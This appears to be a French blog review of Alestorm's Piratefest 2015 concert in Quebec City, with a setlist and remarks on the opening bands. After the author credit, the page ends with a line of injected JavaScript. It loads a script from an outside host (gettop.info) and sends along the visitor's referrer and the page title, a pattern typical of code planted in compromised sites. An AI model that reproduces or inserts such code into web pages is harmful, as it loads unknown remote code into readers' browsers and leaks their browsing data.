SHOW ALESTORM PIRATEFEST 2015 2-02-15

 

Holala, j’avais une humeur incendiaire hier soir entre les puants, crinqués, cinglants et différents mécréants présents au Piratefest 2015 à l’Impérial de Québec. Entre le son vacillant techniquement de Nordheim, la prestation qui suce(merci Fred) de The Dreadcrew of Oddwood, et finalement les bouffons deaths de Swashbuckle, j’étais à un doigt de péter les plombs et de faire un carnage! Hum, pourtant n’étais-ce pas la frénésie générale qui devait contaminer la foule? Sans me poser de questions et avant de commettre l’irréparable, comme certains d’ailleurs qui ont manqué une partie capitale du show, je suis monté à l’étage pour reprendre mes sens. J’avoue que Swashbuckle ont tiré tonne de sarcasmes, sourires, tout en enflammant la foule présente, mais enfin…

 

Par contre, j’affirme humblement avoir mangé toute une volée avec la prestation d’Alestorm! C’est par une entrée très forte qu’ils ont débuté par Walk the Plank du dernier album. Wow ça valait la peine d’attendre, j’étais conquis et j’avais déjà le sang qui me battait les tempes! Passant par The sunk’n Norwegian et la favorite de Christopher Bowes Shipwrecked, c’était définitif je voulais les albums! La réponse du public était malade enchaînant avec Magnetic North, Back Through Time et That Famous Ol’ Spiced, entrecoupé d’un « scream to me Quebec! » de Bowes aussitôt assourdi par la foule! Ils ont continué sous les lighters allumés pendant la balade Nancy the Tavern Wench avant de reprendre en force avec Midget Saw et Keelhauled. Bref, j’ai rien à redire sur leur prestation sauf qu’ils m’ont remis la foi sur leur style avec Pirate Song et Drink! Sérieux, chapeau! En rappel, j’ai rejoint la foule au lieu du vestiaire pour 1741, Hangover (Taio Cruz cover) et Captain Morgan’s Revenge, pour repartir avec Rum derrière la tête en quittant… Thumb’s up Alestorm, je suis maintenant accro!

Texte: Vincent Couturier

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;